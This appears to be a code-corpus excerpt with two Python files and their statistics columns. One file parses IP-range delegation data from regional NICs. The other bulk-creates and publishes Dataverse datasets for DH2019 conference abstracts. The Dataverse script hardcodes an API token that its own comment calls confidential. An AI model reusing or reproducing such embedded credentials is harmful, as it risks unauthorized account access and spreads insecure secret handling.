ftp.login()
print('# Changing cwd to: %s' % file_path)
ftp.cwd(file_path)
details = _file_details(ftp, file_name)
file_cache = '_'.join([details['name_local'],
details['size'],
details['modify']])
file_cache += '.csv'
if file_cache in os.listdir(TWD):
print('# File is already downloaded !')
return
print('# Downloading ...')
retr = 'RETR %s' % details['name_remote']
local_file = os.path.join(TWD, file_cache)
ftp.retrbinary(retr, open(local_file, 'wb').write)
print('# Downloaded!')
# The parsing part of the program
def _address_range_ipv4(address, width):
"Convert IPv4 address and amount to integer range."
# The width of ipv4 addresses is given in number of addresses which
# are not bounded by exact netmasks for example a width of 640 addresses.
blocks = address.split('.')
for index, block in enumerate(blocks):
blocks[index] = bin(int(block, 10))[2::].zfill(8)
blocks = ''.join(blocks)
network = int(blocks, 2)
broadcast = network + int(width) - 1
return(network, broadcast)
def _ipv6_to_int(ipv6_address):
"Convert an IPv6 address to an integer"
packed_string = socket.inet_pton(socket.AF_INET6, ipv6_address.exploded)
return int(hexlify(packed_string), 16)
def _address_range_ipv6(address, width):
"Convert IPv6 address and broadcast to integer range."
network = ipaddress.ip_network(address+'/'+width)
broadcast = _ipv6_to_int(network.broadcast_address)
network = _ipv6_to_int(network.network_address)
return(network, broadcast)
def _address_range(ipv, address, width):
"From an IP address create integers for the network and broadcast IP"
    # This is essentially the range in between which an IP address sits.
if ipv == 4:
# IPv4, the width is given as the number of IPs
network, broadcast = _address_range_ipv4(address, width)
else:
# IPv6, width is given by a netmask.
network, broadcast = _address_range_ipv6(address, width)
return (network, broadcast)
def _parse_row(row):
"Parse and modify the row."
columns = row.strip().split('|')
    # If there aren't more than 6 columns we can't parse it, so skip it.
if len(columns) > 6:
tmp = columns[:5]
if len(tmp[1].strip()) == 0:
# This is the country it is assigned to, if there is no country
# I am not interested in it.
return None
if tmp[2].strip().lower() not in ['ipv4', 'ipv6']:
# If the protocol is not an IP protocol (such as asn), I am not
# interested.
return None
if '6' in tmp[2]:
tmp[2] = 6
else:
tmp[2] = 4
# Convert the IP address and netmask/number of IP's to an IP range where
# the IPs are converted to a numerical value.
tmp[3], tmp[4] = _address_range(tmp[2], tmp[3], tmp[4])
return tmp
class CompactRanges(object):
"Try to compact the ranges."
def __init__(self):
self.ranges = list()
def add(self, *newer):
"Add a line to the ranges, compacting where possible."
# nic, tld, ipv, network, broadcast = *newer
newer = list(newer)
if len(self.ranges) == 0:
self.ranges.append(newer)
return
# Testing if current range is a continuation of the previous one
older = self.ranges[-1]
if older[0] == newer[0] and \
older[1] == newer[1] and \
older[2] == newer[2] and \
older[4] == newer[3] - 1:
            # The older broadcast is the same as the newer network - 1, thus it is a
# continuation, so extending the range of the older one.
self.ranges[-1][4] = newer[4]
else:
self.ranges.append(newer)
def length(self):
"return length of ranges"
return len(self.ranges)
def _local_file_from_url(url):
"Open the file, if available from the url"
file_name = _split_url(url)[2]
candidates = list()
for candidate in os.listdir(TWD):
if file_name.lower() in candidate.lower():
candidates.append(candidate)
candidates.sort(reverse=True)
if len(candidates) == 0:
print('# No files to parse')
return None
file_full = os.path.join(TWD, candidates[0])
return file_full
def parse_latest(url):
"Parse a file as it has been retrieved from the url."
file_name = _local_file_from_url(url)
if file_name is None:
print('# No files available to parse !')
return
print('# Opening file: %s' % file_name)
compacted = CompactRanges()
count_linesall = 0
count_relevant = 0
with open(file_name, 'r') as file_open:
for row in file_open:
count_linesall += 1
parsed = _parse_row(row)
if parsed is None:
continue
count_relevant += 1
compacted.add(*parsed)
print('# Parsed %s lines' % count_linesall)
print('# - of which relevant: %s' % count_relevant)
print('# - reduced to ranges: %s' % compacted.length())
return compacted.ranges
def _compact_string(text):
"try making text compacter"
# we go through the text and try to replace repeated characters with:
# _c_n_ where c is the character and n is the amount of if. The underscore
# in this context is guaranteed to not occur in text. As such we can use
# it as an escape character.
# Also we do not collapse if repeated character is below 5.
tmp = list()
last = ''
count = 0
for character in text+'_':
# Add the underscore so we make sure not to miss the last bit of the
        # string if it happens to end on more than 4 identical characters.
count += 1
if character != last:
if count > 4:
tmp = tmp[:len(tmp)-count]
tmp.append('_%s_%s_' % (last, count))
count = 0
last = character
tmp.append(character)
# Remove the appended underscore before returning.
return ''.join(tmp)[:-1]
def get():
"Fetch and parse data"
print('#'*79)
print('# Fetching data from regional NICs.')
print('#'*79)
tmp = list()
for delegate in DELEGATES:
print('# Using: %s' % delegate)
download(delegate)
tmp += parse_latest(delegate)
print('#' * 79)
print('# A total of %s IP ranges have been defined.' % len(tmp))
for nic, country, ipv, network, broadcast in tmp:
hex_network = hex(network)[2::].zfill(32)
hex_broadcast = hex(broadcast)[2::].zfill(32)
rid = nic[:2]+country+str(ipv)+hex_broadcast+hex_network
rid = rid.lower()
rid = _compact_string(rid)
yield rid, nic, country, ipv, hex_network, hex_broadcast
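# --- Illustrative sketch (appended; not part of the original module) ---
# Demonstrates the run-length collapsing performed by _compact_string():
# runs of five or more identical characters become _c_n_ markers.
def _example_compact_string():
    assert _compact_string('aaaaaabc') == '_a_6_bc'
    assert _compact_string('abcd') == 'abcd'  # short runs are left alone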
| 32.120275
| 80
| 0.609714
| 1,252
| 9,347
| 4.450479
| 0.241214
| 0.021536
| 0.007897
| 0.008615
| 0.061019
| 0.008615
| 0
| 0
| 0
| 0
| 0
| 0.014773
| 0.27581
| 9,347
| 290
| 81
| 32.231034
| 0.808391
| 0.221461
| 0
| 0.11165
| 0
| 0.019417
| 0.199182
| 0.043084
| 0
| 0
| 0
| 0
| 0
| 1
| 0.072816
| false
| 0
| 0.038835
| 0
| 0.18932
| 0.106796
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34bb5b87da16431c41b077d93418d9a992f6e4d0
| 6,281
|
py
|
Python
|
src/dh2019dataverse.py
|
Mish-JPFD/DAPIload
|
d1f2c0e9832e6731c7e98f03481712db765e9af6
|
[
"MIT"
] | null | null | null |
src/dh2019dataverse.py
|
Mish-JPFD/DAPIload
|
d1f2c0e9832e6731c7e98f03481712db765e9af6
|
[
"MIT"
] | null | null | null |
src/dh2019dataverse.py
|
Mish-JPFD/DAPIload
|
d1f2c0e9832e6731c7e98f03481712db765e9af6
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Author : Jacques Flores
Created : October 17th,2019
About: Script for creating datasets in Dataverse.
An Empty JSON file with Dataverse structure is imported and converted into a JSON dict
Metadata is imported from an excel file into a pandas dataframe and written into the empty JSON formatted string.
"""
from pyDataverse import api
from pyDataverse.utils import read_file_json
from pyDataverse.utils import dict_to_json
import pandas as pd
import copy
def create_datasets(dataverse, xl, template):
dataset = 0
entries = xl['paperID'].count()
handles_list = []
while dataset < entries:
#Make a copy of the dataverse json template as metadata
metadata = copy.deepcopy(template)
#Store metadata from excel into variables
authorname = xl.loc[:, xl.columns.str.endswith('name')]
authoraffiliations = xl.loc[:, xl.columns.str.endswith('organisation')]
contactname = xl.loc[dataset,'submitting_author']
title = xl.loc[dataset]['title']
contactemail = xl.loc[dataset]['authors_formatted_1_email']
subject = 'Arts and Humanities'
poster = xl.loc[dataset]['contribution_type'] == 'Poster'
fileid = xl.loc[dataset]['paperID']
#modify metadata
#title
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][0]\
['value'] = title
#Authorname and affiliation
for author, affiliation in zip(authorname.iloc[dataset].dropna(), authoraffiliations.iloc[dataset].dropna()):
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][1]\
['value'].append({\
'authorName': {'value': author , 'typeClass': 'primitive', 'multiple': False, 'typeName': 'authorName'},\
'authorAffiliation':{'value': affiliation , 'typeClass': 'primitive', 'multiple': False, 'typeName': 'authorAffiliation'}})
#E-mail contact
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][2]\
['value'][0]['datasetContactEmail']['value'] = contactemail
#Dataset contact name
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][2]\
['value'][0]['datasetContactName']['value'] = contactname
#Description
if poster:
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][3]\
['value'][0]['dsDescriptionValue']['value'] = "Abstract and poster of paper %s presented at the Digital Humanities Conference 2019 (DH2019), Utrecht , the Netherlands 9-12 July, 2019." % fileid
else:
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][3]\
['value'][0]['dsDescriptionValue']['value'] = "Abstract of paper %s presented at the Digital Humanities Conference 2019 (DH2019), Utrecht , the Netherlands 9-12 July, 2019." % fileid
#Subject (controlled vocabulary: only set values are allowed; check dataverse for these )
metadata['datasetVersion']['metadataBlocks']['citation']['fields'][4]\
['value'][0]= subject
#converting dictionary into a json formatted string
metadata1 = dict_to_json(metadata)
#creating Dataset in "RDMtest"dateverse with metadata and print response
dset = dataverse.create_dataset( "DH2019", metadata1)
print ('-' * 40)
print (dset.json())
print (dset.status_code)
#store persistent identifier from newly created dataset
handle = dset.json()['data']['persistentId']
handles_list.append((handle,fileid))
        #upload files (I had to edit the api upload_file function (pkg: pydataverse) because it kept raising an error; as a result it does not return a response)
        #if there is a poster it will upload the abstract and the poster, ELSE it will only upload the abstract
        #The abstract should be named "paperIDa.pdf" [e.g. 100a.pdf] and the poster "paperIDp.pdf" [e.g. 100p.pdf] for it to work.
        #If named differently this can be changed below
if poster:
dataverse.upload_file(handle , 'filesa/%sa.pdf' % (fileid))
dataverse.upload_file(handle , 'filesa/%sp.pdf' % (fileid))
else:
dataverse.upload_file(handle , 'filesa/%sa.pdf' % (fileid))
#publish dataset and print response
pubdset = dataverse.publish_dataset(handle, type = "major", auth = True)
print ('-' * 40)
print (pubdset.json())
print (pubdset.status_code)
        #Counter for datasets and emptying the metadata template
dataset = dataset + 1
metadata = {}
return(handles_list)
def publish_datasets(dataverse, handles_list):
#publish dataset and print response
dataset = 0
entries = handles_list[0].count()
while dataset < entries:
handle = handles_list.iloc[dataset][0]
pubdset = dataverse.publish_dataset(handle, type = "major", auth = True)
print ('-' * 40)
print (pubdset.json())
print (pubdset.status_code)
# Confidential API Token (Do Not Distribute) ****last four digits removed)
apitoken = "38404b17-46f9-4fe5-808e-a4a38bd80aea"
# Demo Dataverse server
dtvserver = "https://dataverse.nl"
#Loading connection and authentication
dataverse = api.Api(dtvserver,apitoken)
#reading json file as dict
template = read_file_json('dataversetemplate.json')
#read excel file with metadata as pandas dataframe
xlfile = "DH2019_paperswithfiles.xlsx"
xl = pd.read_excel(xlfile, converters={'paperID': str})
handles = create_datasets(dataverse, xl, template)
handles_df = pd.DataFrame(handles)
handles_df.to_excel("handles.xlsx")
| 44.864286
| 215
| 0.603566
| 656
| 6,281
| 5.724085
| 0.347561
| 0.009321
| 0.067111
| 0.082024
| 0.319308
| 0.216778
| 0.203462
| 0.203462
| 0.150732
| 0.150732
| 0
| 0.021623
| 0.285783
| 6,281
| 139
| 216
| 45.18705
| 0.815426
| 0.245343
| 0
| 0.306667
| 0
| 0.026667
| 0.241181
| 0.023374
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026667
| false
| 0
| 0.066667
| 0
| 0.093333
| 0.12
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|